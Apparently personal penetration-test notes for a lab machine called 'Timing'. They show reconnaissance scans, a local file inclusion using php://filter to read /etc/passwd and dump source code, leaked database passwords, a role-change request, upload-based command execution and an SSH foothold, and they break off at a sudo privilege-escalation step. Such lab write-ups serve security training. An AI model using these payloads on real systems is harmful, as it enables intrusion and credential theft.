Timing
10.10.11.135

export TARGET=10.10.11.135



##################
└─$ nmap -sC -sV -oA nmap/result $TARGET
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-06 20:05 EDT
Nmap scan report for 10.10.11.135
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d2:5c:40:d7:c9:fe:ff:a8:83:c3:6e:cd:60:11:d2:eb (RSA)
|   256 18:c9:f7:b9:27:36:a1:16:59:23:35:84:34:31:b3:ad (ECDSA)
|_  256 a2:2d:ee:db:4e:bf:f9:3f:8b:d4:cf:b4:12:d8:20:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Simple WebApp
|_Requested resource was ./login.php
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.74 seconds

#####################################################################################################################
9011/tcp filtered d-star
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


#####################################################################################################################
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://10.10.11.135   
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.135
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/05/06 20:15:48 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 313] [--> http://10.10.11.135/images/]
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.135/css/]   
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.135/js/]    
/server-status        (Status: 403) [Size: 277]                                  
Progress: 190399 / 220561 (86.32%)                                              [ERROR] 2022/05/06 21:06:49 [!] Get "http://10.10.11.135/39903": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
                                                                                 
===============================================================
2022/05/06 21:14:52 Finished
===============================================================
                                                                 
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://10.10.11.135 -t 50 -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.135
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2022/05/06 21:32:02 Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 200) [Size: 5609]
/profile.php          (Status: 302) [Size: 0] [--> ./login.php]
/index.php            (Status: 302) [Size: 0] [--> ./login.php]
/image.php            (Status: 200) [Size: 0]                  
/header.php           (Status: 302) [Size: 0] [--> ./login.php]
/images               (Status: 301) [Size: 313] [--> http://10.10.11.135/images/]
/footer.php           (Status: 200) [Size: 3937]                                 
/upload.php           (Status: 302) [Size: 0] [--> ./login.php]                  
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.135/css/]   
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.135/js/]    
/logout.php           (Status: 302) [Size: 0] [--> ./login.php]    



#####################################################################################################################

└─$ wfuzz -u http://10.10.11.135/image.php?FUZZ=/etc/passwd -w /usr/share/SecLists/Discovery/Web-Content/burp-parameter-names.txt -t 50 --hh 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.11.135/image.php?FUZZ=/etc/passwd
Total requests: 6453

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                    
=====================================================================

000002803:   200        0 L      3 W        25 Ch       "img"                                                                                                                                                                      

Total time: 33.90224
Processed Requests: 6453
Filtered Requests: 6452
Requests/sec.: 190.3414

#####################################################################################################################

http://10.10.11.135/image.php?img=/etc/passwd
Hacking attempt detected!

#####################################################################################################################

http://10.10.11.135/image.php?img=php://filter/convert.base64-decoder/resource=/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
aaron:x:1000:1000:aaron:/home/aaron:/bin/bash

#####################################################################################################################

curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=login.php | base64 -d

curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=login.php | base64 -d > extracted_files/login.php
curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=index.php | base64 -d > extracted_files/index.php
curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=header.php | base64 -d > extracted_files/header.php
curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=footer.php | base64 -d > extracted_files/footer.php
curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=auth_check.php | base64 -d > extracted_files/auth_check.php
curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=db_conn.php | base64 -d > extracted_files/db_conn.php
curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=upload.php | base64 -d > extracted_files/upload.php
curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=profile.php | base64 -d > extracted_files/profile.php
curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=logout.php | base64 -d > extracted_files/logout.php
curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=image.php | base64 -d > extracted_files/image.php
curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=admin_auth_check.php | base64 -d > extracted_files/admin_auth_check.php
curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=js/profile.js | base64 -d > extracted_files/js/profile.js
curl http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=profile_update.php | base64 -d > extracted_files/profile_update.php

#####################################################################################################################
DB CONNECTION
$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', '4_V3Ry_l0000n9_p422w0rd');
dbname=app
root
4_V3Ry_l0000n9_p422w0rd

#####################################################################################################################
LOGIN
user: aaron
password: aaron


#####################################################################################################################
Role=1

POST /profile_update.php HTTP/1.1
Host: 10.10.11.135
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 52
Origin: http://10.10.11.135
Connection: close
Referer: http://10.10.11.135/profile.php
Cookie: PHPSESSID=1i9e9731d6hk3p98bjr5i0onkr

firstName=test&lastName=test&email=test&company=test&role=1



#####################################################################################################################
Upload image

python3 generate_filenames.py >> names.txt

upload www/debug.php.jpg

Ctrl+C

python3 test_names.py


#####################################################################################################################
code execution
└─$ python3 execute_command.py id
└─$ python3 execute_command.py "ls -la"

#####################################################################################################################
└─$ python3 execute_command.py "ls -la /opt"          
total 624
drwxr-xr-x  2 root root   4096 Dec  2 11:19 .
drwxr-xr-x 24 root root   4096 Nov 29 01:34 ..
-rw-r--r--  1 root root 627851 Jul 20  2021 source-files-backup.zip

└─$ python3 execute_command.py "cp /opt/*.zip /var/www/html/"
└─$ curl -o www/source-files-backup.zip http://10.10.11.135/source-files-backup.zip
└─$ python3 execute_command.py "rm /var/www/html/source-files-backup.zip"

#####################################################################################################################
https://github.com/internetwache/GitTools

└─$ unzip source-files-backup.zip
└─$ /opt/GitTools/Extractor/extractor.sh backup/ git_dump/

#####################################################################################################################
OLD PASSWORD
$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', 'S3cr3t_unGu3ss4bl3_p422w0Rd');

#####################################################################################################################
SSH
ssh aaron@10.10.10.11.135
└─$ ~/pwncat-env/bin/pwncat-cs aaron@10.10.11.135


#####################################################################################################################
(remote) aaron@timing:/home/aaron$ sudo -l
Matching Defaults entries for aaron on timing:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User aaron may run the following commands on timing:
    (ALL) NOPASSWD: /usr/bin/netutils


#####################################################################################################################
(remote) aaron@timing:/home/aaron$ ln -s /root/.ssh/authorized_keys keys


